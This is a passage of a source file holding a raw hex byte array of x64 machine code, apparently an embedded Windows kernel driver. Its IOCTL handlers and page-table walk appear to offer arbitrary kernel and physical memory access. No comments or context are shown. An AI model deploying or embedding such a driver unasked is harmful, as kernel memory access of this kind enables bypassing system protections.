0x0F, 0x42, 0xF2, 0x80, 0x7F, 0x30, 0x00, 0x4C, 0x8B, 0xC6, 0x74, 0x10, 167 | 0x4C, 0x8B, 0xC9, 0x49, 0x8B, 0xD2, 0x48, 0x8B, 0xC8, 0xE8, 0x9A, 0x03, 168 | 0x00, 0x00, 0xEB, 0x17, 0x48, 0x89, 0x4C, 0x24, 0x20, 0x41, 0xB9, 0x01, 169 | 0x00, 0x00, 0x00, 0x49, 0x8B, 0xCA, 0x48, 0x8B, 0xD0, 0xFF, 0x15, 0x89, 170 | 0x0C, 0x00, 0x00, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 171 | 0x48, 0x8B, 0x5C, 0x24, 0x48, 0x48, 0x8B, 0x74, 0x24, 0x50, 0x48, 0x83, 172 | 0xC4, 0x30, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 173 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 174 | 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 175 | 0x48, 0x8B, 0x82, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xFA, 0xBB, 0x01, 176 | 0x00, 0x00, 0xC0, 0x8B, 0x50, 0x18, 0x8B, 0x48, 0x10, 0x81, 0xFA, 0xCC, 177 | 0xB0, 0x2B, 0x00, 0x75, 0x25, 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 178 | 0x3B, 0xCE, 0x75, 0x10, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xCF, 0xFE, 0xFF, 179 | 0xFF, 0x8B, 0xD8, 0xE9, 0x4A, 0x01, 0x00, 0x00, 0xBB, 0x04, 0x00, 0x00, 180 | 0xC0, 0xE9, 0x3D, 0x01, 0x00, 0x00, 0x81, 0xFA, 0xD0, 0xB0, 0x2B, 0x00, 181 | 0x75, 0x22, 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x75, 182 | 0xE3, 0x49, 0x8B, 0x4F, 0x18, 0x48, 0x8D, 0x15, 0xF8, 0x1B, 0x00, 0x00, 183 | 0x48, 0x8B, 0x49, 0x08, 0xFF, 0x15, 0xEE, 0x0B, 0x00, 0x00, 0xEB, 0xC5, 184 | 0x81, 0xFA, 0xD4, 0xB0, 0x2B, 0x00, 0x0F, 0x85, 0x93, 0x00, 0x00, 0x00, 185 | 0x41, 0xBE, 0x38, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x75, 0xB5, 0x49, 186 | 0x8B, 0x47, 0x18, 0x80, 0x78, 0x30, 0x00, 0x74, 0x30, 0x48, 0x83, 0x3D, 187 | 0xC3, 0x1B, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xE7, 0x00, 0x00, 0x00, 0x48, 188 | 0x8B, 0x78, 0x20, 0x48, 0x8D, 0x58, 0x28, 0x48, 0x8B, 0x70, 0x10, 0x48, 189 | 0x8B, 0x68, 0x18, 0xFF, 0x15, 0x8F, 0x0B, 0x00, 0x00, 0x4C, 0x8B, 0x05, 190 | 0xA0, 0x1B, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0xEB, 0x2E, 0x48, 0x83, 0x3D, 191 | 0x93, 0x1B, 0x00, 0x00, 0x00, 0x0F, 0x84, 0xB7, 0x00, 0x00, 0x00, 0x48, 192 | 0x8B, 0x78, 0x20, 0x48, 0x8D, 0x58, 0x28, 0x48, 0x8B, 0x70, 0x18, 0x48, 193 | 0x8B, 0x68, 0x10, 0xFF, 0x15, 0x5F, 0x0B, 0x00, 0x00, 0x48, 0x8B, 0x0D, 194 | 0x70, 0x1B, 0x00, 0x00, 0x4C, 0x8B, 0xC0, 0x48, 0x89, 0x5C, 0x24, 0x30, 195 | 0x4C, 0x8B, 0xCE, 0xC6, 0x44, 0x24, 0x28, 0x00, 0x48, 0x8B, 0xD5, 0x48, 196 | 0x89, 0x7C, 0x24, 0x20, 0xFF, 0x15, 0x62, 0x0B, 0x00, 0x00, 0xE9, 0x26, 197 | 0xFF, 0xFF, 0xFF, 0x81, 0xFA, 0xD8, 0xB0, 0x2B, 0x00, 0x75, 0x1D, 0x41, 198 | 0xBE, 0x18, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 0x16, 0xFF, 199 | 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xF1, 0xFC, 0xFF, 0xFF, 0xE9, 200 | 0x01, 0xFF, 0xFF, 0xFF, 0x81, 0xFA, 0xDC, 0xB0, 0x2B, 0x00, 0x75, 0x1D, 201 | 0x41, 0xBE, 0x10, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 0xF1, 202 | 0xFE, 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0xF4, 0xFB, 0xFF, 0xFF, 203 | 0xE9, 0xDC, 0xFE, 0xFF, 0xFF, 0x81, 0xFA, 0xE0, 0xB0, 0x2B, 0x00, 0x75, 204 | 0x1D, 0x41, 0xBE, 0x10, 0x00, 0x00, 0x00, 0x41, 0x3B, 0xCE, 0x0F, 0x85, 205 | 0xCC, 0xFE, 0xFF, 0xFF, 0x49, 0x8B, 0x4F, 0x18, 0xE8, 0x17, 0xFD, 0xFF, 206 | 0xFF, 0xE9, 0xB7, 0xFE, 0xFF, 0xFF, 0xBB, 0x10, 0x00, 0x00, 0xC0, 0x45, 207 | 0x33, 0xF6, 0x33, 0xD2, 0x41, 0x89, 0x5F, 0x30, 0x49, 0x8B, 0xCF, 0x4D, 208 | 0x89, 0x77, 0x38, 0xFF, 0x15, 0x93, 0x0A, 0x00, 0x00, 0x48, 0x8B, 0x6C, 209 | 0x24, 0x68, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x60, 0x48, 0x8B, 0x74, 210 | 0x24, 0x70, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 211 | 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 212 | 0x56, 0x41, 0x57, 0x48, 0x8B, 0xEC, 0x48, 0x83, 0xEC, 0x40, 0x4C, 0x8B, 213 | 0xF2, 0x48, 0xC7, 0x45, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF2, 214 | 0x48, 0xC7, 0x45, 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xFA, 0x48, 215 | 0xC1, 0xEE, 0x0C, 0x48, 0x8B, 0xDA, 0x48, 0xC1, 0xEF, 0x15, 0xB8, 0xFF, 216 | 0x01, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x27, 0x48, 0x23, 0xD0, 0x48, 0xC1, 217 | 0xEB, 0x1E, 0x48, 0x83, 0xE1, 0xF0, 0x41, 0xBC, 0x01, 0x00, 0x00, 0x00, 218 | 0x48, 0x23, 0xF0, 0x48, 0x23, 0xF8, 0x48, 0x23, 0xD8, 0x45, 0x8B, 0xCC, 219 | 0x48, 0x8D, 0x45, 0x40, 0x41, 0x81, 0xE6, 0xFF, 0x0F, 0x00, 0x00, 0x48, 220 | 0x8D, 0x14, 0xD1, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8D, 0x4D, 0x50, 221 | 0x45, 0x8D, 0x44, 0x24, 0x07, 0xFF, 0x15, 0x1D, 0x0A, 0x00, 0x00, 0x48, 222 | 0x8B, 0x4D, 0x50, 0x8A, 0xC1, 0xF6, 0xD0, 0x41, 0x84, 0xC4, 0x0F, 0x85, 223 | 0xF1, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x45, 0x40, 0x48, 0xC7, 0x45, 0x58, 224 | 0x00, 0x00, 0x00, 0x00, 0x49, 0xBF, 0x00, 0xF0, 0xFF, 0xFF, 0x0F, 0x00, 225 | 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x49, 0x23, 0xCF, 0x45, 0x8B, 226 | 0xCC, 0x48, 0x8D, 0x14, 0xD9, 0x41, 0x8D, 0x5C, 0x24, 0x07, 0x44, 0x8B, 227 | 0xC3, 0x48, 0x8D, 0x4D, 0x58, 0xFF, 0x15, 0xD5, 0x09, 0x00, 0x00, 0x48, 228 | 0x8B, 0x55, 0x58, 0x8A, 0xC2, 0xF6, 0xD0, 0x41, 0x84, 0xC4, 0x0F, 0x85, 229 | 0xA9, 0x00, 0x00, 0x00, 0x84, 0xD2, 0x79, 0x1F, 0x48, 0x8B, 0x4D, 0x48, 230 | 0x48, 0xB8, 0x00, 0x00, 0x00, 0xC0, 0xFF, 0xFF, 0x0F, 0x00, 0x48, 0x23, 231 | 0xC2, 0x81, 0xE1, 0xFF, 0xFF, 0xFF, 0x3F, 0x48, 0x03, 0xC1, 0xE9, 0x88, 232 | 0x00, 0x00, 0x00, 0x49, 0x23, 0xD7, 0x48, 0xC7, 0x45, 0xF0, 0x00, 0x00, 233 | 0x00, 0x00, 0x48, 0x8D, 0x45, 0x40, 0x45, 0x8B, 0xCC, 0x4C, 0x8B, 0xC3, 234 | 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8D, 0x4D, 0xF0, 0x48, 0x8D, 0x14, 235 | 0xFA, 0xFF, 0x15, 0x79, 0x09, 0x00, 0x00, 0x48, 0x8B, 0x45, 0xF0, 0x8A, 236 | 0xC8, 0xF6, 0xD1, 0x41, 0x84, 0xCC, 0x75, 0x51, 0x84, 0xC0, 0x79, 0x0F, 237 | 0x48, 0x8B, 0x4D, 0x48, 0x49, 0x23, 0xC7, 0x81, 0xE1, 0xFF, 0xFF, 0x1F, 238 | 0x00, 0xEB, 0xB0, 0x49, 0x23, 0xC7, 0x48, 0xC7, 0x45, 0x48, 0x00, 0x00, 239 | 0x00, 0x00, 0x45, 0x8B, 0xCC, 0x48, 0x8D, 0x4D, 0x48, 0x4C, 0x8B, 0xC3, 240 | 0x48, 0x8D, 0x14, 0xF0, 0x48, 0x8D, 0x45, 0x40, 0x48, 0x89, 0x44, 0x24, 241 | 0x20, 0xFF, 0x15, 0x31, 0x09, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x48, 0x49, 242 | 0x23, 0xC7, 0x4A, 0x8D, 0x0C, 0x30, 0x48, 0xF7, 0xD8, 0x48, 0x1B, 0xC0, 243 | 0x48, 0x23, 0xC1, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x40, 0x41, 244 | 0x5F, 0x41, 0x5E, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0x5D, 0xC3, 0xCC, 0xCC, 245 | 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 246 | 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x49, 0x8B, 0xF1, 0x49, 247 | 0x8B, 0xD8, 0x48, 0x8B, 0xEA, 0x48, 0x85, 0xC9, 0x74, 0x38, 0x41, 0xB8, 248 | 0x04, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xD3, 0xFF, 0x15, 0xA7, 0x08, 0x00, 249 | 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x74, 0x21, 0x4C, 0x8B, 0xC3, 250 | 0x48, 0x8B, 0xD5, 0x48, 0x8B, 0xC8, 0xE8, 0x79, 0x01, 0x00, 0x00, 0x48, 251 | 0x8B, 0xD3, 0x48, 0x89, 0x1E, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0x7A, 0x08, 252 | 0x00, 0x00, 0x33, 0xC0, 0xEB, 0x05, 0xB8, 0x01, 0x00, 0x00, 0xC0, 0x48, 253 | 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48, 0x8B, 0x74, 254 | 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xFF, 0x25, 0xAE, 0x08, 255 | 0x00, 0x00, 0xFF, 0x25, 0xB0, 0x08, 0x00, 0x00, 0x40, 0x53, 0x48, 0x83, 256 | 0xEC, 0x10, 0x33, 0xC0, 0x33, 0xC9, 0x0F, 0xA2, 0x44, 0x8B, 0xC8, 0x33, 257 | 0xC9, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x45, 0x32, 0xC0, 0x0F, 0xA2, 0x89, 258 | 0x04, 0x24, 0x89, 0x5C, 0x24, 0x04, 0x89, 0x4C, 0x24, 0x08, 0x89, 0x54, 259 | 0x24, 0x0C, 0x0F, 0xBA, 0xE1, 0x14, 0x73, 0x2E, 0xB3, 0x08, 0x44, 0x8A, 260 | 0xC3, 0x0F, 0xBA, 0xE1, 0x1B, 0x73, 0x23, 0x0F, 0xBA, 0xE1, 0x1C, 0x73, 261 | 0x1D, 0x33, 0xC9, 0x0F, 0x01, 0xD0, 0x48, 0xC1, 0xE2, 0x20, 0x48, 0x0B, 262 | 0xD0, 0x44, 0x0F, 0xB6, 0xC3, 0x80, 0xE2, 0x06, 0x8D, 0x41, 0x0C, 0x80, 263 | 0xFA, 0x06, 0x44, 0x0F, 0x44, 0xC0, 0xB8, 0x07, 0x00, 0x00, 0x00, 0x44, 264 | 0x3B, 0xC8, 0x7C, 0x39, 0x33, 0xC9, 0x0F, 0xA2, 0x89, 0x04, 0x24, 0x41, 265 | 0x8A, 0xC0, 0x0C, 0x02, 0x89, 0x54, 0x24, 0x0C, 0x0F, 0xB6, 0xD0, 0x0F, 266 | 0xBA, 0xE3, 0x09, 0x41, 0x0F, 0xB6, 0xC0, 0x0F, 0x43, 0xD0, 0x89, 0x5C, 267 | 0x24, 0x04, 0x89, 0x4C, 0x24, 0x08, 0x44, 0x8A, 0xC2, 0xF6, 0xC3, 0x20, 268 | 0x74, 0x0B, 0xF6, 0xC2, 0x04, 0x74, 0x06, 0x80, 0xCA, 0x10, 0x44, 0x8A, 269 | 0xC2, 0x41, 0x80, 0xC8, 0x01, 0x44, 0x88, 0x05, 0x94, 0x17, 0x00, 0x00, 270 | 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x10, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 271 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xC2, 0x00, 0x00, 0xCC, 272 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 273 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 274 | 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 275 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 276 | 0xCC, 0xCC, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 277 | 0xFF, 0x25, 0xC2, 0x07, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 278 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 279 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 280 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 281 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 282 | 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x8B, 0xC1, 0x49, 0x83, 0xF8, 0x08, 0x72, 283 | 0x37, 0x49, 0x83, 0xF8, 0x10, 0x77, 0x11, 0x4C, 0x8B, 0x1A, 0x4A, 0x8B, 284 | 0x54, 0x02, 0xF8, 0x4C, 0x89, 0x19, 0x4A, 0x89, 0x54, 0x01, 0xF8, 0xC3, 285 | 0x49, 0x83, 0xF8, 0x20, 0x77, 0x5A, 0x0F, 0x10, 0x02, 0x42, 0x0F, 0x10, 286 | 0x4C, 0x02, 0xF0, 0x0F, 0x11, 0x01, 0x42, 0x0F, 0x11, 0x4C, 0x01, 0xF0, 287 | 0xC3, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x85, 0xC0, 0x74, 288 | 0x15, 0x48, 0x2B, 0xD1, 0x72, 0x16, 0x44, 0x8A, 0x1C, 0x11, 0x48, 0xFF, 289 | 0xC1, 0x49, 0xFF, 0xC8, 0x44, 0x88, 0x59, 0xFF, 0x75, 0xF0, 0xC3, 0x0F, 290 | 0x1F, 0x44, 0x00, 0x00, 0x49, 0x03, 0xC8, 0x44, 0x8A, 0x5C, 0x11, 0xFF, 291 | 0x48, 0xFF, 0xC9, 0x49, 0xFF, 0xC8, 0x44, 0x88, 0x19, 0x75, 0xF0, 0xC3, 292 | 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 293 | 0x4E, 0x8D, 0x1C, 0x02, 0x48, 0x2B, 0xD1, 0x73, 0x09, 0x4C, 0x3B, 0xD9, 294 | 0x0F, 0x87, 0x6E, 0x01, 0x00, 0x00, 0x0F, 0x10, 0x04, 0x11, 0x48, 0x83, 295 | 0xC1, 0x10, 0xF6, 0xC1, 0x0F, 0x74, 0x12, 0x48, 0x83, 0xE1, 0xF0, 0x0F, 296 | 0x10, 0x0C, 0x11, 0x0F, 0x11, 0x00, 0x0F, 0x28, 0xC1, 0x48, 0x83, 0xC1, 297 | 0x10, 0x4C, 0x03, 0xC0, 0x4C, 0x2B, 0xC1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 298 | 0xE9, 0x06, 0x74, 0x6F, 0x49, 0x81, 0xF9, 0x00, 0x10, 0x00, 0x00, 0x0F, 299 | 0x87, 0xB3, 0x00, 0x00, 0x00, 0x49, 0x83, 0xE0, 0x3F, 0xEB, 0x2D, 0x66, 300 | 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 301 | 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 302 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 303 | 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x10, 0x0C, 0x11, 304 | 0x0F, 0x10, 0x54, 0x11, 0x10, 0x0F, 0x10, 0x5C, 0x11, 0x20, 0x0F, 0x10, 305 | 0x64, 0x11, 0x30, 0x0F, 0x29, 0x41, 0xF0, 0x48, 0x83, 0xC1, 0x40, 0x49, 306 | 0xFF, 0xC9, 0x0F, 0x29, 0x49, 0xC0, 0x0F, 0x29, 0x51, 0xD0, 0x0F, 0x29, 307 | 0x59, 0xE0, 0x0F, 0x28, 0xC4, 0x75, 0xD1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 308 | 0xE9, 0x04, 0x74, 0x19, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 309 | 0x0F, 0x29, 0x41, 0xF0, 0x0F, 0x10, 0x04, 0x11, 0x48, 0x83, 0xC1, 0x10, 310 | 0x49, 0xFF, 0xC9, 0x75, 0xEF, 0x49, 0x83, 0xE0, 0x0F, 0x74, 0x0E, 0x4E, 311 | 0x8D, 0x5C, 0x01, 0xF0, 0x41, 0x0F, 0x10, 0x0C, 0x13, 0x41, 0x0F, 0x11, 312 | 0x0B, 0x0F, 0x29, 0x41, 0xF0, 0xC3, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 313 | 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x1F, 0x80, 314 | 0x00, 0x00, 0x00, 0x00, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 0xE9, 0x06, 0x49, 315 | 0x83, 0xE0, 0x3F, 0x0F, 0x18, 0x44, 0x11, 0x40, 0xEB, 0x2E, 0x66, 0x66, 316 | 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 317 | 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 318 | 0x00, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x0F, 319 | 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x0F, 0x10, 0x0C, 0x11, 320 | 0x0F, 0x10, 0x54, 0x11, 0x10, 0x0F, 0x10, 0x5C, 0x11, 0x20, 0x0F, 0x10, 321 | 0x64, 0x11, 0x30, 0x0F, 0x2B, 0x41, 0xF0, 0x48, 0x83, 0xC1, 0x40, 0x0F, 322 | 0x18, 0x44, 0x11, 0x40, 0x49, 0xFF, 0xC9, 0x0F, 0x2B, 0x49, 0xC0, 0x0F, 323 | 0x2B, 0x51, 0xD0, 0x0F, 0x2B, 0x59, 0xE0, 0x0F, 0x28, 0xC4, 0x75, 0xCC, 324 | 0x0F, 0xAE, 0xF8, 0xE9, 0x33, 0xFF, 0xFF, 0xFF, 0x0F, 0x1F, 0x40, 0x00, 325 | 0x49, 0x03, 0xC8, 0x0F, 0x10, 0x44, 0x11, 0xF0, 0x48, 0x83, 0xE9, 0x10, 326 | 0x49, 0x83, 0xE8, 0x10, 0xF6, 0xC1, 0x0F, 0x74, 0x18, 0x4C, 0x8B, 0xD9, 327 | 0x48, 0x83, 0xE1, 0xF0, 0x0F, 0x10, 0x0C, 0x11, 0x41, 0x0F, 0x11, 0x03, 328 | 0x0F, 0x28, 0xC1, 0x4C, 0x8B, 0xC1, 0x4C, 0x2B, 0xC0, 0x4D, 0x8B, 0xC8, 329 | 0x49, 0xC1, 0xE9, 0x06, 0x74, 0x39, 0x49, 0x83, 0xE0, 0x3F, 0xEB, 0x04, 330 | 0x0F, 0x1F, 0x40, 0x00, 0x0F, 0x10, 0x4C, 0x11, 0xF0, 0x0F, 0x10, 0x54, 331 | 0x11, 0xE0, 0x0F, 0x10, 0x5C, 0x11, 0xD0, 0x0F, 0x10, 0x64, 0x11, 0xC0, 332 | 0x0F, 0x29, 0x01, 0x48, 0x83, 0xE9, 0x40, 0x49, 0xFF, 0xC9, 0x0F, 0x29, 333 | 0x49, 0x30, 0x0F, 0x29, 0x51, 0x20, 0x0F, 0x29, 0x59, 0x10, 0x0F, 0x28, 334 | 0xC4, 0x75, 0xD1, 0x4D, 0x8B, 0xC8, 0x49, 0xC1, 0xE9, 0x04, 0x74, 0x19, 335 | 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x29, 0x01, 0x0F, 336 | 0x10, 0x44, 0x11, 0xF0, 0x48, 0x83, 0xE9, 0x10, 0x49, 0xFF, 0xC9, 0x75, 337 | 0xEF, 0x49, 0x83, 0xE0, 0x0F, 0x74, 0x0F, 0x4C, 0x8B, 0xD9, 0x4D, 0x2B, 338 | 0xD8, 0x41, 0x0F, 0x10, 0x0C, 0x13, 0x41, 0x0F, 0x11, 0x0B, 0x0F, 0x29, 339 | 0x01, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 340 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 341 | 0x48, 0x8B, 0xC1, 0x0F, 0xB6, 0xD2, 0x49, 0xB9, 0x01, 0x01, 0x01, 0x01, 342 | 0x01, 0x01, 0x01, 0x01, 0x49, 0x0F, 0xAF, 0xD1, 0x66, 0x48, 0x0F, 0x6E, 343 | 0xC2, 0x0F, 0x16, 0xC0, 0x49, 0x83, 0xF8, 0x40, 0x72, 0x6E, 0xF6, 0x05, 344 | 0x17, 0x14, 0x00, 0x00, 0x02, 0x74, 0x0D, 0x49, 0x81, 0xF8, 0x20, 0x03, 345 | 0x00, 0x00, 0x0F, 0x83, 0x08, 0x01, 0x00, 0x00, 0x0F, 0x11, 0x01, 0x4C, 346 | 0x03, 0xC1, 0x48, 0x83, 0xC1, 0x10, 0x48, 0x83, 0xE1, 0xF0, 0x4C, 0x2B, 347 | 0xC1, 0x49, 0x83, 0xF8, 0x40, 0x72, 0x47, 0x4A, 0x8D, 0x54, 0x01, 0xF0, 348 | 0x4E, 0x8D, 0x4C, 0x01, 0xD0, 0x49, 0x83, 0xE1, 0xF0, 0x49, 0xC1, 0xE8, 349 | 0x06, 0x0F, 0x29, 0x01, 0x0F, 0x29, 0x41, 0x10, 0x48, 0x83, 0xC1, 0x40, 350 | 0x49, 0xFF, 0xC8, 0x0F, 0x29, 0x41, 0xE0, 0x0F, 0x29, 0x41, 0xF0, 0x75, 351 | 0xE8, 0x41, 0x0F, 0x29, 0x01, 0x41, 0x0F, 0x29, 0x41, 0x10, 0x41, 0x0F, 352 | 0x29, 0x41, 0x20, 0x0F, 0x11, 0x02, 0xC3, 0x0F, 0x1F, 0x44, 0x00, 0x00, 353 | 0x49, 0x83, 0xF8, 0x10, 0x72, 0x2A, 0x4D, 0x8D, 0x4C, 0x08, 0xF0, 0x49, 354 | 0x83, 0xE0, 0x20, 0x0F, 0x11, 0x01, 0x49, 0xD1, 0xE8, 0x41, 0x0F, 0x11, 355 | 0x01, 0x42, 0x0F, 0x11, 0x04, 0x01, 0x49, 0xF7, 0xD8, 0x43, 0x0F, 0x11, 356 | 0x04, 0x01, 0xC3, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 357 | 0x49, 0x83, 0xF8, 0x04, 0x72, 0x2A, 0x4D, 0x8D, 0x4C, 0x08, 0xFC, 0x49, 358 | 0x83, 0xE0, 0x08, 0x89, 0x11, 0x49, 0xD1, 0xE8, 0x41, 0x89, 0x11, 0x42, 359 | 0x89, 0x14, 0x01, 0x49, 0xF7, 0xD8, 0x43, 0x89, 0x14, 0x01, 0xC3, 0x66, 360 | 0x66, 0x66, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 361 | 0x4D, 0x85, 0xC0, 0x74, 0x11, 0x88, 0x11, 0x4E, 0x8D, 0x4C, 0x01, 0xFE, 362 | 0x49, 0x83, 0xF8, 0x01, 0x74, 0x04, 0x66, 0x41, 0x89, 0x11, 0xC3, 0xCC, 363 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 364 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 365 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 366 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 367 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x57, 0xF6, 0x05, 0xF8, 368 | 0x12, 0x00, 0x00, 0x01, 0x74, 0x32, 0x48, 0x8B, 0xF9, 0x4C, 0x03, 0xC1, 369 | 0x0F, 0x11, 0x01, 0x48, 0x83, 0xC7, 0x40, 0x0F, 0x11, 0x41, 0x10, 0x48, 370 | 0x83, 0xE7, 0xC0, 0x0F, 0x11, 0x41, 0x20, 0x4C, 0x2B, 0xC7, 0x0F, 0x11, 371 | 0x41, 0x30, 0x49, 0x8B, 0xC8, 0x4C, 0x8B, 0xC8, 0x66, 0x48, 0x0F, 0x7E, 372 | 0xC0, 0xF3, 0xAA, 0x49, 0x8B, 0xC1, 0x5F, 0xC3, 0xE8, 0x3F, 0x00, 0x00, 373 | 0x00, 0xEB, 0xC7, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 374 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 375 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 376 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 377 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 378 | 0xCC, 0xCC, 0xCC, 0xCC, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x50, 0x48, 379 | 0x83, 0xEC, 0x30, 0x0F, 0x29, 0x44, 0x24, 0x20, 0xE8, 0x2B, 0xFA, 0xFF, 380 | 0xFF, 0x0F, 0x28, 0x44, 0x24, 0x20, 0x48, 0x83, 0xC4, 0x30, 0x58, 0x59, 381 | 